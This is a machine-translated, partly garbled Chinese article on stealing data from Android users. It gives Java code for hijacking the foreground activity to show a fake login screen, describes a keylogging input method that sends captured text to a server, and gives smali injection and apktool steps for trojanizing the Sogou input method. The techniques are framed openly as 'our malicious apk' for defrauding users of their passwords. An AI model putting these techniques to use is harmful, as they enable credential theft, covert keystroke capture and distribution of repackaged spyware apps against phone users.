Author:Icefish@Insight-Labs.org0 × 01 what kind of app sensitive information can we get on android phones?Sensitive app information on mobile phones: Address Book, communication record, text message, account and password of various apps, input information and materials, and other photo and video materials0 × 02 What methods can we get them?Address Book, communication records, text messages, and such information require a large number of sensitive permissions applied for by our malicious apk during installation, such as <uses-permission android: name = "android. permission. READ_CONTACTS "/> A typical contact information permission, which must be declared in the configuration file. Otherwise, the account and password of various apps cannot be obtained, and information should be entered, in the case of non-root users, it is very difficult to obtain this information. If you want to forcibly obtain this information, there are roughly three methods-. stack hijacking. For the complete code, see Appendix 1. Example code B is given below. -Some apk will store sensitive information in the SD card. claud once mentioned here, I will not talk about c. -The read and write permissions of some apk configuration files are not properly set, which is relatively small-in addition, we can repackage the well-known apk files and release them again, for example, you can modify the apk file of QQ before publishing it.0 × 03 core code of stack hijacking
ActivityManager activityManager = (ActivityManager) getSystemService (Context. ACTIVITY_SERVICE );
List <RunningAppProcessInfo> appProcesses = activityManager. getRunningAppProcesses ();
// Enumeration process
For (RunningAppProcessInfo appProcess: appProcesses ){
// If the APP is on the frontend
If (appProcess. importance = RunningAppProcessInfo. IMPORTANCE_FOREGROUND ){
// Whether the APP is in the list to be hijacked
If (mVictims. containsKey (appProcess. processName )){
If (UILogin. started = 0)
{
Intent UIIntent = new Intent (getBaseContext (), mVictims. get (appProcess. processName ));
UIIntent. addFlags (Intent. FLAG_ACTIVITY_NEW_TASK );
GetApplication (). startActivity (UIIntent );
UILogin. started = 1;
}
Advantage: you do not need to modify the target apk to cleverly defraud the user's account and password. disadvantage: The hijacked interface cannot perform the next login smoothly after obtaining the user password, as a result, the user will realize that something is wrong (except in rare cases, the pop-up interface can exchange the user password to the normal apk interface)
Advantages and disadvantages of 0 × 04 Android apk repackaging
Omitted
0 × 05 think about other methodsThis should be a technology that can be used by non-root users. It should be a low-privilege technology. It should be a general-purpose technology. This is a hard-to-detect technology, in android, apk is basically insulated from each other. What can I use to allow my apk to access other apk sensitive resources? In ios, without jailbreak, why is it not allowed to install third-party input methods? Are there any vulnerabilities hidden here !!!
0 × 06 Android Input Method mechanism-Process
An input method application is an application that processes user input behaviors. To be able to run properly in the Android Input Method Framework, all Input Method Applications must inherit specific services. The Input Method Framework of the Android platform defines a base class of InputMethodService for the input method application. InputMethodService provides a standard implementation of an input method. Defines important functions in the input method life cycle and provides them to developers for corresponding processing.
A. When the user triggers the input method display (the client control gets the focus), InputMethodService starts. First, call the onCreate () function. This function is called when the input method is started for the first time. It is suitable for initialization settings, which are the same as those of other services;
B. Call the onCreateInputView () function to create a KeyboardView in the function and return the result;
C. Call the onCreateCandidatesView () function to create a candidate area and return it;
D. Call the onStartInputView () function to start the input,
E. Call the onFinishInput () function after the input ends to end the current input,
F. If you move to the next input box, the onStartInputView and onFinishInput functions are repeatedly called;
G. Call the onDestroy () function when the input method is disabled.
0 × 07 Android Input Method mechanism-details (important)A. In InputMethodService, there are several noteworthy methods or classes getCurrentInputEditorInfo (). This method can obtain a set of Object Attributes EditorInfo in the current editing box. It has the following key attributes:
EditorInfo. hintText is the default value of the edit box as the name suggests. This is a key attribute.
EditorInfo. packageName refers to the package name of the apk to which the control belongs. For example, the packageName of all the editing boxes in Mobile QQ is com. tencent. qqb. the getCurrentInputConnection () method obtains an InputConnection object in the current editing box. This object has multiple powerful methods that can call commitText (CharSequence text, int newCursorPosition ), A key function is used to write the getTextAfterCursor (int n, int flags) getTextBeforeCursor (int n, int flags) value to the edit box)
As the name suggests, it is to get the string in the input box. n indicates the number of digits read, and flags is set to 0.
Hack Technology of 0 × 08 Android Input Method
We can implement an input method by ourselves, record each character input, and send the value of the input box to the server in the onFinishInput method. For details, see Sample Code 2, the android DEMO code SoftKeyboard is used to modify the spyware apk,
Only two changes are made to the source code.
Add SoftKeyIcefish. postInfo (this );
The onFinishInput method is added to SoftKeyIcefish. start ();
0 × 09 Android input method-repackaging sogou Input Method
Through the sougou configuration file, we can find that the key InputMethodService class is
Com. sohu. inputmethod. sogou. SogouIME. smali
Open this file and search for committext, and add
Invoke-static {p0}, Lcom/sohu/inputmethod/sogou/SoftKeyIcefish;-> postInfo (Landroid/inputmethodservice/InputMethodService;) V
SoftKeyIcefish. postInfo (this)
Find onFinishInput () v
Add
Invoke-static {}, Lcom/sohu/inputmethod/sogou/SoftKeyIcefish;-> start () V
That is
SoftKeyIcefish. start ();
Apktool B packaging, signature, testing
0 × 10 test results, commentsFor more information, see ppt.
Repackaging the input method is used to steal user information. The advantage is that the permission requirements are very low. Only one network permission is required to steal all kinds of user input information, on the other hand, the permissions applied for by various input methods are already very high. The hinttext and package name contained in the stolen information can help us locate the specific apk and input box information conveniently.
For details about 0 × 11, see the ppt attachment.
Http://www.bkjia.com/uploadfile/2012/1106/20121106013650798.rar